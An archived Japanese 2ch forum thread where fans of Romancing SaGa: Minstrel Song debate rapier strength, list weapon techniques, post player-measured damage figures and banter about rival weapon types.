細剣+2テラツヨス (717) TOP カテ一覧 スレ一覧 2ch元 削除依頼
テイルズオブエクシリア質問スレ (356)
PS3の希望ゲーム (308)
ル。のドラクエ]プレイ日記ゼノスレ3656ページ目 (102)
【PS3】白騎士物語-古の鼓動-LEVEL198 (222)
【PS3】 キャラ性能&戦術Part1【TOV】 (270)
スーパーロボット大戦OG外伝攻略スレ Part4 (447)

細剣+2テラツヨス


1 :2006/10/06 〜 最終レス :2012/08/18
かつてロマサガSFC最強武器スレが立ったとき、細剣は一度死んだ・・・
それほどまでにSFC板の細剣は酷評されたのだ
私は二度と細剣を死なせたくない
私は世界に存在する全ての細剣をいとおしく思っているよ・・・
炎のロッド経由クリムゾンフレアテラツヨスwwwww

2 :
■前スレ
【細剣テラツヨスwwwww】
http://game10.2ch.net/test/read.cgi/goverrpg/1118720900/
火力とかそんなものだけが武具の強さを示すのではない、そんな程度の議論
ならば剣士ヴァンダで論議は幕を閉じるであろうし、それでかまわない。
我々の見出す真の強さとは、これすなわち極限状態のバトルにおいても
決して屈することのない、粘り負けしない底力、これこそが真の強さを有する
武具なのではないか。

3 :
>>1
はえーんだよカスR

4 :
電光石火のごとく速いなw

5 :
>>4
お前の2ゲットは剣閃のごとき速さ

6 :
>>5
そういうお主の5げtもハヤブサ斬りのごとく

7 :
スレ立ては合わせ打ちのごとく

8 :
美しい>>1乙が、今始まる!

9 :
みんな続いてくれよ!

10 :
+1を飛ばして+2?

11 :
【細剣】
・片手武器 ディフレクト可(自) 海賊、剣士対応
・技
共震剣…低コスト。威力は上の下。回避されやすい。
電光石火…中コスト。威力は中の上。行動速度上昇。
     様々な敵に安定してダメージが入る。命中は並。
乱れ突き…中コスト。威力は上の下。最大5HIT。回避されづらい。
火の鳥…炎のロッド必須。中コストの高威力全体攻撃。
    魔族や、魚には軽減されやすい。
【片手斧】
・片手武器 ディフレクト不可 海賊、帝国海兵対応
・技
フライ・バイ…低コスト。威力は中の上。投射攻撃。命中は並。
      加撃が発生すると威力が段違いに高くなる。発生頻度は1割程度。
高速ナブラ…高コスト。威力は上の中。命中精度が高い。
      加撃のシバトラは本作品中で1、2を争うほどの威力を誇る。
      発生頻度は1割程度。
トマホーク…極低コスト。威力は下の上から中の下程度。投射攻撃。
      命中精度が高く、加撃が発生すると見違えるほど強くなる。
      発生頻度は1割程度。
次元断…中コスト。即死技。ダメージソースとしては物足りない。
骨砕き…低コスト。STRダウン技。ダメージソースとしては物(ry
かかと切り…低コスト。AGIダウン技。ダメージソ(ry
      無足が発生するが、連携しやすくなるくらいしかかわらない。
ブレードロール…低コストの全体攻撃。威力は下の上から中の下。命中は並。
      加撃が発生すれば払車剣に匹敵する威力になる。発生頻度は2割程度。

12 :
【刀】
・両手武器 ディフレクト不可 武芸家、エスタミル古流闘士対応
・技
秘踏みの太刀…中コスト。威力は中の上。LPダメージ付加。命中精度が悪い。
      無足が発生するとわりと強くなる。発生頻度は1割程度。
逆風の太刀…高コスト。威力は中の中から中の上。AGIダウン技。
      あまり使ったことないから詳しくはわからん。
月影の太刀…高コスト。威力は中の上。命中は並。
      無足1〜2割、加撃1割、奥義はオマケ。
      雪足の威力は月影に毛が生えた程度。三花仙は上の中程度の威力。
      雪月花はシバトラと同等以上だが割にあわない。
光の腕…高コスト。威力は中の上。範囲攻撃(ベルト)。速度上昇効果。
払車剣…中コスト。威力は上の下。最大3HITの全体攻撃。命中精度は並。
      武器での全体攻撃技では最強の部類。
      加撃が発生するとギャラクシィーにも匹敵する威力を誇る。
      発生頻度は1割以上2割未満。
【曲刀】
・片手武器 ディフレクト可(自) エスタミル古流闘士、帝国海兵対応
・技
八つ裂き…低コスト。威力は中の上。回避されやすい。
デミルーン…低コスト。威力はステダウン技と同等。命中は並。投射攻撃。
      加撃が発生すると多少強くはなるが、弱いことにかわりはない。
かかと切り…片手斧参照
ブレードロール…片手斧参照
デッドリースピン…高コスト。威力は上の中。命中精度は並。
幻体戦士術…幻獣剣必須。真猿討伐の友。
【衝槍】
・両手武器 ディフレクト可(全) ローザリア重装兵、クジャラート闘士対応
・技
螺旋突き…低コスト。威力は中の中から中の上。命中精度は並以下。
双竜破…低コスト。威力は中の上。命中精度は並。
    様々な敵に安定したダメージが期待できる。
乱れ突き…細剣参照
流星衝…極高コスト。威力は中の上。命中精度は高い。
     加撃が発生すると威力が上昇するが、それでもヴァンダクラス。
光の腕…刀参照
スウィング…低コスト。威力は下の中。スタン効果。回避されやすい。
吹雪…翼の槍必須。高コスト。威力は中の上。全体攻撃。
    火の鳥と使い分けると幸せになれる。
火の鳥…マリストリク必須。ロッド鳥よりやや強いが、剣士効果には劣る。

13 :
【体術】
・両手使用 カウンター可 ゲッコの騎士、エスタミル古流闘士対応
・技
稲妻キック…中コスト。威力は中の上。命中精度がやや高い。
      複合属性のため使い易い。
スピアー…低コスト。威力は中の下。命中は並以下。
     無足は速度上昇効果がある反面、威力の上昇はほとんどない。
     加撃は威力が段違いに高いうえ、魔法盾以外では回避されない。
     発生頻度はそれぞれ1割程度。
三角蹴り…中コスト。威力は中の上。回避されづらい。
羅刹掌…高コスト。威力はトップクラス。即死効果付き。命中精度はやや低い。
     遅延効果があるが、連携属性はあまりよくない。
明王九印…極高コスト。威力は上の上。回避されづらい。
三龍旋…高コスト。威力は上の中。命中精度がかなり高い。
空気投げ…低コスト。威力に期待するのは間違い。スタン付加。速度上昇効果。
     魔法盾だって貫通しちゃいます。
サブミッション…低コスト。威力は中の下。STRダウン技。
      魔法盾貫通。加撃が発生すると少し強くなる。頻度はやや低め。
      こいつと癒しの水、浄化の水だけでブレイズスレイブを殺れる。
練気…中コスト。回復量はほとんどステに依存しない。自然回復効果。
     加撃はハズレかもしれない。
【大型剣】
・両手武器 ディフレクト可(全) 城塞騎士、竜人対応
・技
共震剣…細剣参照
不動剣…高コスト。威力は上の上。命中精度はやや高い。遅延効果。
アッパースマッシュ…中コスト。威力はトップクラス。回避されやすい。
V-インパクト…高コスト。威力は上の上。命中は並。
光の腕…刀参照
払車剣…刀参照
みね打ち…極低コスト。マヒ攻撃。ダメージはない。刀でも使える。
【棍棒】
・片手武器 ディフレクト可(自) ローザリア重装兵、ローザリア術法士対応
・技
削岩撃…低コスト。威力は中の中から中の上。命中精度はよくない。
旋回撃…低コスト。威力は中の中。命中精度は並。
     無足が発生すれば威力が少し上がる。発生頻度は記憶にございません。
かめごうら割り…中コスト。威力は上の下。命中精度は高い。DEFダウン効果。
ウォータームーン…高コスト。威力は中の上から上の下。LPダメージ付加。
      極めて回避されづらい。
グランドスラム…高コスト。威力だけなら雲身払車剣すら凌ぐ。スネア付加。
      ターン終了時に本領を発揮するため、敵の攻撃を受けることが多い。
      また、土術特性をもつため、飛んでる敵に当たらないのも難点。

14 :
・ロマンランキング(武器)
1.紅孔雀…実用性が低い!まさにロマンのみを追求した武器
2.青の剣…ロマンと実用性を兼ね備えた武器
3.竜槍ケレンドロウズ…微妙な性能、微妙な入手率
4.竜槍マリストリク…入手はケレンより大変だけど性能は上
5.死の剣…使えない武器NO.1?思い出を胸に振るんだ
6.ビルキース…LPを使って相手のLPを削る固有技(´・ω・`)
7.竜鱗の剣…金竜から奪うより、発掘のほうが楽だと思う。
8.ロードオブカオス…水竜剣を捨てて、こっちをとる人に乾杯
9.ろばの骨…使うこと自体にロマンを感じる、俺ガイル
10.コスモエッグ…君主の大斧は強いんだぞ!まぁ、対応クラスは少ないけど
・(技、術)
1.火車、ハイドラスフォールズ、石化クチバシ、天変地異…即死注意!
5.恐・竜・誕・生…ドキドキしない?
6.月影の太刀…乱れ雪月花
7.無双三段…天衣無縫
8.ウォールブレイカー…合成術なんですよね、これ……
9.覚醒印…別名『死の宣告』。今、俺が決めた。
10.カットイン…ライトニング・クイック

15 :
新スレついでに小型剣のアピール。気に入らなかったらスルーしておいてくれ。
作る人いなかったら打槍、杖も作っておく。
【小型剣】
・片手武器 ディフレクト可(自) アサシン、帝国海兵対応
・技
電光石火…細剣参照
共震剣…細剣参照
乱れ突き…細剣参照
変幻自在…高コスト、威力は上の下。命中精度は並。8回攻撃。
      強度を上げれば対応外クラスでもEPコストをゼロに出来る。
癒しの水…水竜剣必須。前衛に持たせればウコム回復を超え、最速回復手段となる。
タイムディシーバー…同じく水竜剣必須。速度次第でハメ殺しを実現出来る。

16 :
>変幻自在…高コスト、威力は上の下
いや上の上くらいあるぞ
少なくともV-インパクトより強い

17 :
>>15
前スレにも書いたが、細工師!細工師!。
細工師特性が真価を発揮するのは性なる輝きか‥

18 :
>>17
前スレにクラスの選定理由を書いておいた。
>>16
自分としては、威力自体は上の中から上の下と認識している。
威力が上の上と思えるのは、守備力の低い敵を相手に使用した時と、全弾命中した時だろう。
だが他武器の無足・加撃・奥儀は別に考慮していることと、実際には数発は外れる為、
平均値はこの辺りが妥当であると判断した。
勿論、全弾命中すれば上の中は勿論、上の上も狙える。
Vインパクトとどちらが強いかは、変幻自在の方が上だと思っている。
というかVインパクトが上の上ってちょっと納得出来ない。

19 :
つうか技間の威力差に敵守備力は関係無いぞ。
多段ヒットの技は敵が固いと効きにくいというイメージがあるのかも
しれないがそんなことは全く無い。
何故なら多段ヒット技のダメージ量の計算方法は、
まず最初に総ダメージ数を決定した後、それを攻撃回数に応じて
技ごとの一定の割合で分割してるにすぎないから。
(ちなみに変化自在の総ダメージは初撃ダメージの11倍だったと記憶する)

20 :
むしろ多段攻撃技は、単発攻撃より性能がよい。
例えば乱れづきは5段ヒットだが、二発外れた場合単純に3/5ダメージになるのではなく4/5くらい与えれる。
この辺は入り組んだ計算方法で算出されてるから、
詳しく知りたいならアルマニ熟読すべし。
その上さらに、そもそも命中度からいってDの変幻は多くの他技より優秀だ。
つまりミスも考慮した平均ダメージという観点からすれば、
変幻自在はよりいっそう強技とされるわけだが。

21 :
為になるスレだなー

22 :
羅刹の剛剣かっこよい
青の剣の対を成す武器って感じ
だけど弱いけどね
これでスイッチバックかっこよすぎ!

23 :
細剣のいいところは最強技の変幻自在が異様に覚えやすいところにもある
サザンクロスとかスクリュードライバとかファイナルレターは全然覚えないのに
なぜか変幻自在は中盤過ぎるといつの間にか勝手に覚えてる

24 :
>>18
攻撃性能45、腕力70、ゲッコ、前列、トリック、Vインパクト
攻撃性能46、器用さ70、海賊、前列、トリック、変幻自在
変幻は初弾*10.1、Vは初弾*3で算出して、全弾ヒット時
というかVが一度盾で防がれた以外は、全部当たってた。
対象はいろいろだけど、同一ターン内に同じ敵を攻撃した時に計測
Vインパクト
最低915 最大2178 平均1534
変幻自在
最低969 最大2434 平均1863
俺が思ったのはただ一つ。
ゲリュオンに氷晶獣の防御力を分けてあげたいってこと。

25 :
俺はシーフで細剣と小型剣一緒に使ってるよ

26 :
フリーレ様に大地の剣はガチ

27 :
>>24
検証乙
変幻は初弾*10.1だったか
アタックモードなら平均2000ダメ超えそうだね
変幻自在の強さが証明されて嬉しい

28 :
いい加減に前スレ埋めなよw

29 :
2時間以上前に埋まっとるがな

30 :
ああ28の後に埋めたのか

31 :
ロマサガ最強クラスである帝国学術士との相性も抜群の小剣

32 :
噴飯モノ

33 :
>>1
両手大剣にも火の鳥ある。

34 :
知力が20も落ちるじゃねーかよw

35 :
>>27
変幻の倍率はうろ覚えだよ。11倍が正しいかもしれない。
それとAモードだと相手がDモードの時に、ダメージ上昇効果がなくなるから
一概には平均ダメが上がるとはいえないと思う。
アルマニ情報で検証はしてないが、TモードだとDモードの防御力上昇効果を
無効化するらしいから、コンスタントにダメージを入れたいならTモードがいいかもしれない。

36 :
装備補正で腕力95まであげてモーグレイにアビスクリスタルつけて
攻撃力に全部改造割り振って剣士Aモードヴァンダやったら3500当てた
次のターンにアパスマやったら壊れたけどw

37 :
小型剣と大型剣に愛の手を

38 :
>>37
大型剣は技がバランス良く揃うから強いと思うけどな。別に青の剣無くてもそんなに問題ないし。

小型剣は・・・・えーと・・・水竜剣が使えるね!

39 :
つーか、剣は両手大剣と長剣と細剣(火の鳥専用)だけで十分。
大型、小型、カタナとかイラネーよ。技も他の武器の流用だし。

40 :
>>39
残念だが、技のラインナップは
大型剣>長剣、両手大剣
しかし剣士、ロザ重もスキルに対応していないので
妥協して両手大剣を使うしかない
全く使えないクラスだ

41 :
>>40
まあ、ヴァンダと拍車剣があれば十分。
あと両手大剣にフェニクスアローと共振剣とフライバイがあれば完璧だった。

42 :
秘踏みの太刀の
 ガキィンッ!  LP1
が好きです

43 :
>>42
つまりエスタミル古流闘士で刀が好きなんだね!
両手大剣なんて知らんなあ

44 :
>>41
それ、剣の形したホーミングブーメランだろw
まぁ死の剣にHP吸収効果があったりすれば面白かったかもな
>>42
痒い所に手が届く感じだ

45 :
死の剣は捧げた仲間の数だけ性能強化とかだったらよかったのに

46 :
>>44
ダークの剣+デミルーン

47 :
>>45
ちょっとワロタw
グレイでガラハドを捧げて(ry

48 :
>>45
そんなことになったらみんな禿と殿下を捧げてしまうじゃないか。

49 :
名無しキャラ4人+ラストパーティー以外のキャラ全員を捧げるとかさー

50 :
詩人とか赤魔導師とか捧げれたらおもろいな。シルベン(エリス)なんかも。
てか細剣について語り明かそうよみんな。

51 :
話を続けながら自分で〆るとは何という輩だ…
大地の剣からイージスが使えるが、実は結構使える。
シェラハあたりに使うと結構攻撃を防げるので便利。

52 :
‥細剣とは、そもそも苦しい生活を強いられた江戸時代の農民達によって開発された武器らしい
農民A「あの悪徳庄屋め!代官とつるんで俺らから搾り取りやがって‥」
農民B「全くだ‥何もかもがムカツクぜ、くそぅ!」
千歯こき「ポキン」
                          『細剣史』より

53 :
俺は爪楊枝で頸動脈刺したのが始まりだって聞いた

54 :
ロペラってどこが細剣?スキアヴォーナの1.23倍はゴッツイけど。。。

55 :
>>51
イージスは使えることには違いないが、確率論で35%勝率が上がるが大地剣からだとあまり良くない。
ロザ術でOD後大陸蛇の杖から使うのが無難。一気に5人掛け。
杖はバトルスタッフを強化するしかないんだよな。性能上げるには。
狂人の極みとしてーーーーで威力99+エレクトラムで強化した青剣に竜燐シリーズ持って真猿戦に特攻してみたい。剣士で。


56 :
たまにペギーが落とす「――――」ってそんな使い方があったのか!

57 :
ありません

58 :
>>56
武器鍛錬で強化されたのを据え置きして、無補強の状態に戻してもう一度鍛え直しが出来るだけだぞ。

59 :
>>58
できません

補強材が「――――」になり、宿屋回復ができるようになるだけ
武器の能力強化は
例えば青の剣ならアビスブルー等の表記が変わる+4で終了
そこからは何を貼っても武器の能力は+されない

60 :
>>50
汁便と撫裸浮は知らんが、詩人は普通に捧げられる。
普通にLP削らなきゃ復活させられないし。

61 :
>>60
詩人は捧げた状態でデスを倒すと勝手に復活するぞw
進行度100%未満だったり三地点の語りや猿の居場所聞いた後だとどうかわからんけど
クマーと犬は知らんけど

62 :
>>61
デスに猿の居場所聞いて詩人連れて〜のお手軽コースしか自分は試してないや。
デス倒しちゃうと猿場所聞けなくなるから、
他の語りを聞けるようにとの強制復活なのかな?。

63 :
>>62
俺が試したのは
進行度100%未満で詩人捧げる→100%超えてからデスを倒す のパターン
三地点どこも聞いてないのにデス倒したから詩人生き返らせられねーよヽ(`Д´)ノ
っていうハマリの回避措置と思われる
ここまで書いてここがチラ裏じゃないことを思い出した。スマソ

64 :
つまり死の細剣があればいいということですね

65 :
死の細剣技ならあるぞ

66 :
ダークかアビスクリスタル補強の炎のロッドで共震剣!

67 :
こうして「死ぬ細剣」が生まれたのだった‥

68 :
死の技といえば弓なのにー

69 :
スレ違いだけど、
カブトムシみたいな奴のデスホーンって技はムカつくよな。
他にはデスシザーとか。
それに比べソウルドレインのライフブレイカは非常にありがたい。

70 :
スレ違いすぎだろw
http://game10.2ch.net/test/read.cgi/goverrpg/1160027318/

71 :
死の剣よりも、死の弓にして欲しかった。

72 :
それで皆R矢が使えたら面白かったのにw

73 :
とりあえず軌道修正。
細剣最強

74 :
細剣で共震剣とかね、折れるだろとか思うんだが

75 :
それ何てファイナルストライク?

76 :
使わないから想像で書くけど
小型剣ってようするにナイフの事だろ。
そんなモノとフェンシングで使う剣っぽい細剣で技がカブってるのは変だよな。

77 :
ショートソードだろ ナイフじゃ短剣以下だ
刃渡りは60cm程度 70以上が一般的にロングソード(長剣)

78 :
あの見た目だと刃渡りもせいぜい30cm程度に見えるよ

79 :
武器の大きさ(戦闘3DCG※1より)
小型剣<長剣<大型剣<細剣<両手大剣
じゃね?

※1 スリーディメンションコンピュータグラフィックスの略称

80 :
お前マジ頭良いな

81 :
ロペラでかすぎ

82 :
さて、久々にまたミンサガをまた始めるか
クラスは細剣必須だから
海賊3人、剣士2人、ってとこかな

83 :
ロペラと炎のロッドがデカイから細剣は大型剣よりもデカイってイメージが・・・
ロペラなんてモグーレイよりもビッグマグナムだし。

84 :
おまいら、細剣スレらしく「細剣好きに50の質問」というのをこれから勝手に考えてみますよ
Q1 細剣を普段なんて読んでいますか?
   
Q2 細剣を好きな理由を教えて下さい
Q3 細剣が一番似合うと思うキャラクターは?
Q4 愛用の細剣と、その仕様(補強等)を教えて下さい
Q5 一番好きな細剣技を教えて下さい
Q6 ・・・えーと   

85 :
Q1 細剣を普段なんて読んでいますか?
   ほそけん
Q2 細剣を好きな理由を教えて下さい
   タウンソードが好きです
Q3 細剣が一番似合うと思うキャラクターは?
   ジャミル
Q4 愛用の細剣と、その仕様(補強等)を教えて下さい
   ロペラだいすき 攻略サイトに記載のとおり
Q5 一番好きな細剣技を教えて下さい
   返し突き 円舞剣 電光石火
Q6 ・・・こんな技があったらよかったというのがあったらどうぞ
   二刀烈風剣   

86 :
おい、これ延々と続けるとか寒いことやるなよ

87 :
しかもタウンソードは長剣だっつの

88 :
一番好きな技が3つあるなんて凄いね

89 :
Q1 細剣を普段なんて読んでいますか?
   いとだ けん
Q2 細剣を好きな理由を教えて下さい
   ぜいいん両手大剣だとつまらないから
Q3 細剣が一番似合うと思うキャラクターは?
   ベア
Q4 愛用の細剣と、その仕様(補強等)を教えて下さい
   炎のロッド エクトラプリズム
Q5 一番好きな細剣技を教えて下さい
   パリィ
Q6 ・・・こんな技があったらよかったというのがあったらどうぞ
   フライバイとヴァンダライズ 

90 :
76ダガ、
なんちゃらダガーって小型剣があったような・・・

91 :
武器種ごとに技が違うことの方がおれには理解できんよ

92 :
Q1・細い→いを消す→けん→剣に変換
初めて書き込んだとき。

93 :
50の質問とかツマンネ
その質問ネタ自体今更って感じもするし、どっか別んとこでやってくれよ

94 :
いくらなんでも質問シリーズはチラシの裏すぎる

95 :
Q47、あえて細剣の短所を挙げるとしたら?
    信者がキモイ

96 :
そんなことより曲刀でマルチウェイ使おうぜ

97 :
ほそけんなんて信じない
俺が使ってるのはさいけんのはずだ

98 :
不良細剣 なんちて^^v

99 :
だ細剣さー
それもうやめてくれへんのー

100 :
厨国語で「さようなら!」 つまり(ry

101 :
>>96
ダークの剣最強伝説+幻獣剣で確かに強い
というかなんであれ曲刀なんだ?
+3にして結晶つければ強度上げなくても最強の変幻自在が撃てるのが良いのは確かだが。

102 :
>>90
アンティークダガーのことか。

103 :
だが曲刀は長期戦には耐えられない

104 :
Q4 ロペラ+3樹精結晶
Q5サザンクロス ベネトレイト(カットインの無足

105 :
細菌、エスタミル古流術士が結構強いことにきずいた。
レベルファイヴになると100%無職か過激か扇がでるね。

106 :
それ、武芸家と勘違いしてないか?
エス古はサブミッション。ひたすらサブミッション。またまたサブミッション。

107 :
>>106
能力値ダウンも状態異常に含まれるのか!

108 :
大地の剣が意外とミリアムが似合う。
カットインの時の軽いジャンプはアイシャの「ロリポップ!」って感じとはまた違った趣がある。

109 :
マッタリしすぎてて書き込み甲斐がないな。
両手大剣厨あたりが喧嘩売ってこないかなぁ・・・
いつでも(この時間なら)買ってやるのに・・・
片手斧信者でもいいんだぜ。

110 :
ミリたんには炎のロッド。赤い衣装とよく似合う。
紅孔雀があればさらにウマー

111 :
焔のロッド+火の鳥係り
      ↓
気まぐれで通常攻撃する
      ↓
  変 幻 自 在 !!
      

112 :
もうチラ裏でよくね?

113 :
細剣最強がすでに証明されてしまったからね

114 :
好きなものを使ってる間が一番幸せ。

115 :
つまりこう言うことか

  _  ∩
( ゚∀゚)彡 刀!刀!
 ⊂彡

116 :
刀厨かよ・・・
もっと手応えのある奴はいねえのか?
>>1さんがことごとく論破してくださるそうだからよぉ。

117 :

  _  ∩
( ゚∀゚)彡 体術!体術!
 ⊂彡

118 :
払車剣を刀専用技にすればバランスが取れたんだけどな・・・

119 :
久しぶりに刀使ったけど
   弱   い   !

120 :
くだ質から来ますた。最強技議論はこちらでやれとのことで。
各武器の最強技を不等号で並べるとどんな感じになりますか??
くだ質では↓
不動剣=高速ナブラ>ヴァンダ=アパスマ=変幻自在>マルチウェイ=連射
                   >乱調子=水月=石砕無尽>独妙点穴=Vイン
明王九印>羅刹掌=不動剣=高速ナブラ=無双三段=からすとうさぎ>ヴァンダアパスマ変幻自在
という感じです。個人的には明王九印<羅刹掌のような気もするのですが、どうでしょうか。

121 :
>>120
たらい回しにしてすまんが、チラシの裏へ行ってくれ。
ここは細剣最強スレだ。
ttp://game10.2ch.net/test/read.cgi/goverrpg/1160027318/

122 :
両手大剣には敵わぬ。ヴァンダアパスマ、フランベルジュ経由火の鳥、オブシダン。
細剣ヨワスwww

123 :
ところで大型剣と両手大剣って分ける必要あったのか?

124 :
転載
http://saleshop.web.fc2.com/
激安問屋市場が移転セール

125 :
アイスソードの吹雪も追加

126 :
>>109の願いが、>>122によって今更に達成されたか…

127 :
>>122
このスレに書き込む煽りにしては随分程度の低い最強論だな
大剣を支持する神にでもなるつもりなら、もっと脳汁噴出の哲学で
我々を魅了してほしいものだ

128 :
ヴァンダアパスマや不動剣は確かに強いしBPコストもいい
だが消費BPが最大なので改造を耐久度に振らねばならず
武器の威力が最高でも40程度と低くなってしまう。
その点、ロペラは樹精結晶を補強した場合はそのままでも威力54、
中ランクの消費BPが少ない技も高威力で繰り出すことが出来るし
変幻自在はヴァンダアパスパにも引けをとらない。
むしろ速度補正がかかるのでより強力といえる。

129 :
間違えた、2行目消費EPだわ

130 :
細剣強いからって、全員細剣にしたら、それはそれで苦行になるんだよなあ。
っつーか、もう議論なんてし尽くした感がある。
なんで前スレで綺麗に終わらなかったんだ。

131 :
>>122
お仏壇は両手大剣でわないだろう?防具だ。
フランベ火の鳥とかマジでワロタ
知力-20で使う理由がないだろうに。

アイスのセルフ貫通は畏怖狩りに使える。吹雪は要らん。


132 :
>>120
個人的なダメージのみでみた位置付け
強 ヴァンダ アパスマ 【ナブラ】
↑ 変幻自在
│ 羅刹掌 高速なブラ 不動剣
│ Vインパクト 【連射】
│ 明王九印 三龍旋 独妙点欠 連射 ザップ 【月影】 【無双】
│ マルチウェイ デッドリー 【流星衝】
↓ 無双三段 水月 流星衝
弱 月影の太刀 烏兎 ファイナルレター
【】で囲われているのは無足などを考慮した場合の位置付け

133 :
マタドール復活希望

134 :
>133
あっちは、カウンター技が発動する時の一瞬の間が堪らない

135 :
強 【月影の太刀・無足加撃】
↑ 【無双三段・無足加撃】
│ 【高速ナブラ】
│ ヴァンダ アパスマ
│ 【月影の太刀・加撃】
│ 羅刹掌
│ 変幻自在
│ 高速ナブラ 不動剣
アルマニを見るとこんな感じっぽいが

136 :
>>135
そうだな
>>132はここで書き込むにはまだ若い、若すぎる

137 :
>>135
無足+加撃+奥義のダメージと発動率を考慮してってこと。
奥義とかを単体で見るなら
強 雪月花 シヴァ 天衣無縫
↑ 針千本
│ ヴァンダ アパスマ
│ 変幻自在 下り飛龍
│ 羅刹掌 高速なブラ 不動剣 三花仙
│ Vインパクト SBC
│ 明王九印 三龍旋 独妙点欠 連射 ザップ
│ マルチウェイ デッドリー 雪足月影 雪足三段
↓ 無双三段 水月 流星衝
弱 月影の太刀 烏兎 ファイナルレター
石砕無尽、サザンはほとんど使ったことないから、なんともいえない

138 :
そんな「感覚」で語れても困る

139 :
やっぱ下り飛龍ダメだなw
あと月影とファイナルはランクインすら出来ないような…

140 :
流星衝は乱れ突きより弱いウンコ技だからな
昔は強かったんだが

141 :
>>137
お前はなぜ高速なブラが好きなんだ?

142 :
>>141
野暮なこと聞いてやるなよ
・・・じゃあ聞くが、お前は嫌いなのか?

143 :
今気付いた。
こうそくなぶら
そのまま変換すると
高速なブラ
になる
なぶらだけならナブラになる

144 :
せめて海賊テラツヨスwwとか剣士テラツヨスwwwとかだったらまだ議論も
しようがあったのにな…ループしていくんだろうな…

145 :
>>142
いや別に嫌いだなんて……
ただ私はその……なんというか……
       _, ,_
    (・ω・ )  
 (~)、 /   i  )         
  \ ` |_/ /|          
   `ー_( __ノ |
    (  `(  、ノ
wwwww_ノ`i__ノ

146 :
ちょっとだけ調べてみた
攻撃性能8 参照ステータス66 前列 デーコマを対象とする
モードは不一致でディフェンスorトリック
技名   最大 最低 平均
羅刹   1894 1305 1524
明王   1870 1540 1708
三龍   1713 1365 1532
サザン  1169  891 1027
スクリュー  1230  987 1108
レター  912  703  790
変幻   1292 1100 1218
かめ   1128  894 1050
ナブラ  1348  929 1113
スピン  1135  908 1044
ヴァンダ  1576 1140 1256
アパスマ  1335 1122 1208
V     1041  867  967
一度だけでたシヴァトラは1833だった

147 :
やっぱヴァンダアパスマ変幻自在は同じレベルなんだなぁ
そしてレターが弱すぎ。追加効果期待のザコ狩り技だから当然だが。
あとVイン強いとか言うやつが多いのはフシギ。

148 :
無足加撃の発動率がもっと高ければ刀もな
月影は雑魚過ぎる

149 :
1%のロマンに賭ける武器
それが刀

150 :
なんでモードがDorTで不一致なのかね?

151 :
それでもグレイにはなんとなく刀を持たせてしまう俺ガイル

152 :
グレイを武芸家にして古刀しか使わせず、
それ以外のパーティーは術のみ縛りの帝学、ロザ術、ウィザード、赤魔導師(捨てキャラ用)にして
プレイしたけど、ロマンシングさは激しく期待外れだったなぁ。

153 :
>150
技とモードを一致させる、アタックモードにする、などは威力に倍率がかかるからだろう。
基本威力を産出するためにダメージに倍率がかかる条件を排除してるだけだと思うが。

154 :
体術のダメージが飛びぬけてるよな
腕力の参照係数が高いから?

155 :
羅刹掌は旅芸人とかでも平気で2000オーバー出るしなー

156 :
攻撃力8の武器だからな
実際は+300ぐらいか?

157 :
ホーク、ツフ、ゲラハなら素手威力が高い分少し強くなる。
体術が強いのはカウンターダメージを期待できて自分は更に無傷というとんでも特典からだな。

158 :
カタナと武芸者。
強さと美しさを備えたロマンシング☆サガの心。
剣士ヴァンダやOD変幻は、ロマサガ2のQPと同じ。

159 :
QPマヨネーズ?

160 :
細剣と海賊。
優雅さとワイルドさを兼ね備えたミンサガの神髄。
華麗に、エレガントに変幻自在。野性的に、ダイナミックにホークブレイド。
鳴乎、細剣テラツヨス。

161 :
シヴァトラや天衣無縫が強いとかいってる奴はモグリ
剣士対応していない武器はカスです

162 :
細剣スレに常駐しているキモイ連中がいらっしゃいました

163 :
それにしてもQPってなんだ

164 :
クイックポエム

165 :
これはもうダメかもわからんね

166 :
返し突きはカウンター技でもよかったなあ

167 :
何か知らんうちにえらい人気スレになったなココw

168 :
ロマサガ時代はありえないくらいクソ武器だったからな。

169 :
今回マスカレイドないんだな
あったら剣士クラス最強だったかもな

170 :
幾らでも言うぞ
フリーレ様に大地の剣はガチ

171 :
青の剣がある大型剣が最強という結論がでてるはずだが
よって糸冬 了

172 :
こいつ青の剣とか信じてるよw

173 :
>>172

174 :
>171
青の剣五本揃えるのか?クラスは何にするんだ?そもそも青の剣が手に入るまで何を使う気なんだ。
最終武器の性能だけみて結論とか、これだから大型剣厨は困る。
時間をかけて育てきった上での強さ、と言うのは1要因にすぎないんだよ。
早解きや戦闘回数の制限プレイ下への適応性、序盤から終盤までのトータルでの戦闘力の高さ。
最終的な強さも含めてあらゆる面でトップクラスの性能をもっているのが細剣
威力しかみえない両手大剣厨やレア武器の強さに自己満足してるガラハドのような大型剣厨は失笑ものだな。

175 :
青の剣て強度+4にする為にエレクトラムとか使うから、正直あまり強く無くて悲しい…。
状態+20に大型剣の技だから使えるのには違いないんだが。

176 :
細剣持ち(辺境警備兵)の早期警戒が発動したようだw

177 :
ロマンのかけらもない細剣厨(笑)

178 :
最強にロマンなど必要ない。
ロマンと強さ、どちらか一方しか選択できないとしたら
細剣は迷わず
            「 強 さ 」
を選ぶ。

179 :
どうせ細剣厨(笑)は炎のロッドを全員に持たせて一斉に火の鳥かましてニヤニヤシコシコしてんだろうなw
うわ、つまんね
細剣厨の人生つまんね

180 :
個人的には、大型剣の強さは青の剣なんかじゃなくて、共震剣の異様な閃きやすさだと思ってる。道場無しでも序盤から使える可能性が高い&終盤まで使っていける技だから、実用度は高い。
覚えた後は細剣に移っても良いし、長剣で全体ディフレクト要員にするのも良い。『他の武器への橋渡し役』としては凄く強いと思う。
大型剣単体で見た場合は不動剣が閃き辛い,状態異常技が無いのがネックになるから正直強いとは言えないね(城塞騎士なら他の武器で補えるけど)。
毎回使ってるけどなw

181 :
いいぞいいぞ!>>174
もっと言ってやれ!
上のヤシにも一言かましてやれ!

182 :
>>174
大型剣厨はともかくガラハドをバカにするのは我慢ならん。
ガラハドに非はない。
>>178が「強さ」とか言ってるが、
結局「強さ」も「ロマンシング」の内じゃないかと思う。
強さだけ求めて全員細剣したら、それはそれでマイナスあるし、
ロマンシング厨って、言うほど厨じゃない気がしてきた。

183 :
>>180
だいたい同意。砦跡とかサオキの固定敵程度でもあっさり閃くし、これ知ってから評価がかなり上がった。
ホッシャも有るし、惜しむらくはやっぱり不動剣か。
でも、強いかどうかで言うなら相当強い方じゃね?最強にはまあ足りないが。

184 :
やっぱ片手斧ですよ。
ブレードロールが閃き易くていい。

185 :
ようするに海賊強すぎなんだよな
速さと強武器
ロマ2のラピッドストリームみたいなかんじ

186 :
ラピッドストリームはバグ級だし、そこまでいかんでしょ。

187 :
